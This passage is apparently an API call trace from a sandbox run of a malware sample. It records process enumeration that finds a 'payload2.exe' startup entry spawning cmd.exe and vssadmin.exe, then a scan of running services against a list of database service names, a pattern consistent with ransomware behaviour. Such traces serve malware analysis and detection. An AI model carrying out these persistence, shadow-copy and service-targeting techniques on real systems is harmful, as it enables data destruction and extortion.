21 [0046.784] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="counters_config_prostate.exe")) returned 1 [0046.784] lstrlenW (lpString="counters_config_prostate.exe") returned 28 [0046.784] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="teethpichuntercrude.exe")) returned 1 [0046.785] lstrlenW (lpString="teethpichuntercrude.exe") returned 23 [0046.785] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0046.785] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0046.785] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 1 [0046.786] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0046.786] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0046.787] lstrlenW (lpString="cmd.exe") returned 7 [0046.787] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0046.787] lstrlenW (lpString="conhost.exe") returned 11 [0046.787] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0046.788] lstrlenW (lpString="vssadmin.exe") returned 12 [0046.788] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0046.789] lstrlenW (lpString="VSSVC.exe") returned 9 [0046.789] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.789] lstrlenW (lpString="svchost.exe") returned 11 [0046.789] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0046.790] CloseHandle (hObject=0x1c4) returned 1 [0046.790] Sleep (dwMilliseconds=0x1f4) [0047.292] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6803a0 [0047.292] EnumServicesStatusExW (in: hSCManager=0x6803a0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 0 [0047.294] GetLastError () returned 0xea [0047.294] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x12c6) returned 0x39406f0 [0047.294] EnumServicesStatusExW (in: hSCManager=0x6803a0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x39406f0, cbBufSize=0x12c6, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x39406f0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 1 [0047.295] CloseServiceHandle (hSCObject=0x6803a0) returned 1 [0047.295] lstrlenW (lpString="Appinfo") returned 7 [0047.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0047.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0047.295] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0047.295] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0047.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0047.295] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0047.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0047.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0047.295] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0047.295] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0047.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0047.295] lstrlenW (lpString="AudioSrv") returned 8 [0047.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0047.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0047.295] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0047.295] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0047.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0047.295] lstrlenW (lpString="BFE") returned 3 [0047.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0047.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0047.295] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0047.295] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0047.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0047.295] lstrlenW (lpString="CryptSvc") returned 8 [0047.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0047.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0047.296] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0047.296] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0047.296] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0047.296] lstrlenW (lpString="CscService") returned 10 [0047.296] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0047.296] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0047.296] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0047.296] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0047.296] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0047.296] lstrlenW (lpString="DcomLaunch") returned 10 [0047.296] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0047.296] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0047.296] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0047.296] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0047.296] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0047.296] lstrlenW (lpString="Dhcp") returned 4 [0047.296] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0047.296] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0047.296] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0047.296] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0047.296] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0047.296] lstrlenW (lpString="Dnscache") returned 8 [0047.296] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0047.296] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0047.296] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0047.296] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0047.296] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0047.296] lstrlenW (lpString="DPS") returned 3 [0047.296] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0047.296] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0047.296] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0047.296] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0047.296] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0047.296] lstrlenW (lpString="eventlog") returned 8 [0047.296] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0047.296] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0047.296] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0047.296] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0047.296] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0047.296] lstrlenW (lpString="EventSystem") returned 11 [0047.297] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0047.297] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0047.297] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0047.297] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0047.297] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0047.297] lstrlenW (lpString="gpsvc") returned 5 [0047.297] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0047.297] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0047.297] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0047.297] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0047.297] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0047.297] lstrlenW (lpString="iphlpsvc") returned 8 [0047.297] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0047.297] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0047.297] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0047.297] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0047.297] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0047.297] lstrlenW (lpString="LanmanServer") returned 12 [0047.297] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0047.297] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0047.297] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0047.297] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0047.297] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0047.297] lstrlenW (lpString="LanmanWorkstation") returned 17 [0047.297] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0047.297] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0047.297] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0047.297] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0047.297] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0047.297] lstrlenW (lpString="lmhosts") returned 7 [0047.297] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0047.297] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0047.297] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0047.297] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0047.297] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0047.297] lstrlenW (lpString="MMCSS") returned 5 [0047.297] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0047.297] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0047.297] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0047.297] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0047.298] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0047.298] lstrlenW (lpString="MpsSvc") returned 6 [0047.298] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0047.298] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0047.298] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0047.298] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0047.298] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0047.298] lstrlenW (lpString="Netman") returned 6 [0047.298] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0047.298] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0047.298] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0047.298] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0047.298] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0047.298] lstrlenW (lpString="netprofm") returned 8 [0047.298] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0047.298] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0047.298] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0047.298] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0047.298] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0047.298] lstrlenW (lpString="NlaSvc") returned 6 [0047.298] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0047.298] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0047.298] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0047.298] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0047.298] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0047.298] lstrlenW (lpString="nsi") returned 3 [0047.298] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0047.298] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0047.298] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0047.298] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0047.298] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0047.298] lstrlenW (lpString="PcaSvc") returned 6 [0047.298] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0047.298] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0047.298] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0047.298] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0047.298] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0047.298] lstrlenW (lpString="PlugPlay") returned 8 [0047.298] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0047.298] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0047.299] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0047.299] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0047.299] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0047.299] lstrlenW (lpString="Power") returned 5 [0047.299] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0047.299] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0047.299] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0047.299] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0047.299] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0047.299] lstrlenW (lpString="ProfSvc") returned 7 [0047.299] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0047.299] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0047.299] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0047.299] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0047.299] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0047.299] lstrlenW (lpString="RpcEptMapper") returned 12 [0047.299] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0047.299] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0047.299] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0047.299] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0047.299] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0047.299] lstrlenW (lpString="RpcSs") returned 5 [0047.299] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0047.299] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0047.299] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0047.299] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0047.299] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0047.299] lstrlenW (lpString="SamSs") returned 5 [0047.299] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0047.299] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0047.299] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0047.299] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0047.299] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0047.299] lstrlenW (lpString="Schedule") returned 8 [0047.299] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0047.299] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0047.299] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0047.299] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0047.299] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0047.299] lstrlenW (lpString="SENS") returned 4 [0047.300] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0047.300] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0047.300] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0047.300] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0047.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0047.300] lstrlenW (lpString="ShellHWDetection") returned 16 [0047.300] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0047.300] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0047.300] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0047.300] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0047.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0047.300] lstrlenW (lpString="Spooler") returned 7 [0047.300] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0047.300] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0047.300] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0047.300] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0047.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0047.300] lstrlenW (lpString="swprv") returned 5 [0047.300] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0047.300] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0047.300] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0047.300] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0047.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0047.300] lstrlenW (lpString="SysMain") returned 7 [0047.300] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0047.300] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0047.300] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0047.300] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0047.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0047.300] lstrlenW (lpString="Themes") returned 6 [0047.300] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0047.300] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0047.300] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0047.300] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0047.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0047.300] lstrlenW (lpString="TrkWks") returned 6 [0047.300] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0047.300] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0047.300] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0047.300] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0047.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0047.301] lstrlenW (lpString="UxSms") returned 5 [0047.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0047.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0047.301] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0047.301] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0047.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0047.301] lstrlenW (lpString="VSS") returned 3 [0047.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0047.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0047.301] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0047.301] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0047.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0047.301] lstrlenW (lpString="WdiServiceHost") returned 14 [0047.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0047.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0047.301] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0047.301] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0047.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0047.301] lstrlenW (lpString="WdiSystemHost") returned 13 [0047.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0047.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0047.301] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0047.301] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0047.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0047.301] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0047.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0047.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0047.301] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0047.301] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0047.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0047.301] lstrlenW (lpString="Winmgmt") returned 7 [0047.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0047.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0047.301] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0047.301] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0047.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0047.301] lstrlenW (lpString="WPDBusEnum") returned 10 [0047.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0047.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0047.302] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0047.302] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0047.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0047.302] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39406f0 | out: hHeap=0x600000) returned 1 [0047.302] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x210 [0047.303] Process32FirstW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, 